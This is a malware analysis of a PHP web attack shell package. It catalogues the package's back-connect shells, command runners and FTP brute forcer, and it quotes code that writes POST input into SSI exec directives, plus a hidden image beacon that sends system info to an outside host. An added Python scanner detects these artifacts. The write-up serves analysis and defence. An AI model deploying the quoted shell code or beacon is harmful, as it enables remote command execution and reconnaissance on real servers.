Code Carried Internally by Priv8 Attack Shell

This is just a mutated version of the "webroot" hacking package. Both share the weird style of carrying entire programs as base64-encoded, gzipped strings, writing them out and executing them. Many of the programs executed this way are common to both "webroot" and this package, or are very similar.

  • Ph33r/Ph33r.php - PHP, simple cURL based proxy.
  • cgirun/cgi.pr - Perl, remote command execution.
  • cgitelnet1/dc.pl - Perl, "Data Cha0s Connect Back Backdoor", back shell to port 80 on arbitrary host.
  • cgitelnet1/izo.cin - Perl, same as web.root from kinked activex theme.
  • configler/config.izo - Perl, same as config.root from kinked activex theme.
  • litespeed/ssi.php - PHP, same as litebypass.php from the kinked activex theme.
  • perltools/perlbypass.php - PHP, but incorrect syntax. Too goofed up to figure out.
  • python/python.izo - Python, "A simple CGI that executes arbitrary shell commands." Dated 07-07-04.
  • safeof/safe.php - PHP, "Command shell", gaudy PHP exec of two POST parameters.
  • ssim/pss_v.1.0_min.shtml - looks like a little recon via pre-processed HTML. Contains things like <!--#exec cmd="whoami"-->.
  • conp - Python, simple back shell, configurable host and port that it connects back to.
  • dayi - Perl, "simple back connect", somewhat similar to cgitelnet1/dc.pl.
  • ftpcrack.php - PHP, "Cpanel , FTP CraCkeR", brute force (totally random passwords generated) Cpanel and FTP guesser. I'd be surprised if this ever found a password.
  • priv9 - Python, another back shell, different from conp.

litespeed/ssi.php

This is a mutated version of litebypass.php, another Webrootv3 file. ssi.php from this package has a section like this:

<?php
$command = $_POST['command'];
$z00z = $_POST['z00z'];
if($command){
$z11d = "<center><pre><pre>
<br>
Redsecurity.iblogger.org
<br>
<br>
<!--#exec cmd='$command' --> 

";
$openfile = fopen("izo.shtml","w");
$writeinto = fwrite($openfile,"$z11d");
fclose($openfile);
if($openfile){
}else{
}
}

litebypass.php from the kinked activex theme has an almost identical section:

<?php
$command = $_POST['command'];
$l00l = $_POST['l00l'];
if($command){
$z11d = "<center><pre><pre>
<br>
<!--#exec cmd='$command' --> 

";
$openfile = fopen("web.shtml","w");
$writeinto = fwrite($openfile,"$z11d");
fclose($openfile);
if($openfile){
}else{
}
}

It has the same 0x0 "img" web bug that the main PHP file, izocin.php, had:

<img border="0" src="http://priv8.iblogger.org/s.php?'+<?echo "uname -a : "; echo (php_uname())?>";" width="0" height="0">
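
A defender-side check for the two artifacts described above, as an added example that is not part of the original write-up or of the analyzed package: it flags PHP that writes request input into an SSI `exec` directive in an .shtml file, and zero-size remote `<img>` beacons that embed PHP output. The function name `scan` and the finding labels are assumptions made for this example; two of the samples are the excerpts quoted on this page (the first trimmed) and the other two are constructed.

```python
import re

# SSI directive that runs a shell command, e.g. <!--#exec cmd="whoami"-->
SSI_EXEC = re.compile(r"<!--\s*#exec\s+cmd\s*=\s*(['\"])(.*?)\1\s*-->", re.I | re.S)
PHP_VAR = re.compile(r"\$[A-Za-z_]\w*")                  # PHP variable in the command
REQ_INPUT = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\[")
SHTML_WRITE = re.compile(r"fopen\s*\(\s*(['\"])[^'\"]*\.shtml\1\s*,\s*['\"][wa]", re.I)
ZERO_DIM = re.compile(r"\b(?:width|height)\s*=\s*[\"']?0[\"']?(?!\d)", re.I)
REMOTE_SRC = re.compile(r"\bsrc\s*=\s*[\"']?https?://", re.I)


def scan(text):
    """Return sorted finding labels (names are this example's own) for one file."""
    findings = set()
    for m in SSI_EXEC.finditer(text):
        findings.add("ssi-exec")
        if PHP_VAR.search(m.group(2)):
            findings.add("ssi-exec-dynamic")
    if ("ssi-exec-dynamic" in findings and REQ_INPUT.search(text)
            and SHTML_WRITE.search(text)):
        findings.add("shtml-dropper")
    for line in text.splitlines():
        # The tag embeds PHP ("?>"), so match per line instead of parsing up to ">".
        if ("<img" in line.lower() and "<?" in line and REMOTE_SRC.search(line)
                and len(ZERO_DIM.findall(line)) >= 2):
            findings.add("zero-size-beacon")
    return sorted(findings)


# Samples: the first two are excerpts quoted on this page; the last two are constructed.
SSI_PHP = r'''<?php
$command = $_POST['command'];
if($command){
$z11d = "<center><pre><pre>
<!--#exec cmd='$command' -->
";
$openfile = fopen("izo.shtml","w");
$writeinto = fwrite($openfile,"$z11d");
fclose($openfile);
}'''
BEACON = ('<img border="0" src="http://priv8.iblogger.org/s.php?\'+<?echo "uname -a : "; '
          'echo (php_uname())?>";" width="0" height="0">')
DROPPED_SHTML = '<center><pre><pre>\n<!--#exec cmd="whoami"-->\n'      # constructed
BENIGN = '<?php echo "<img src=\\"/logo.png\\" width=\\"120\\" height=\\"40\\">"; ?>'  # constructed

if __name__ == "__main__":
    for name, body in [("ssi.php", SSI_PHP), ("beacon", BEACON),
                       ("izo.shtml", DROPPED_SHTML), ("benign.php", BENIGN)]:
        print(name, scan(body))
```

A plain `ssi-exec` finding in an .shtml file can be legitimate on sites that use server-side includes, so it is the combination with request input and an .shtml write that marks the dropper.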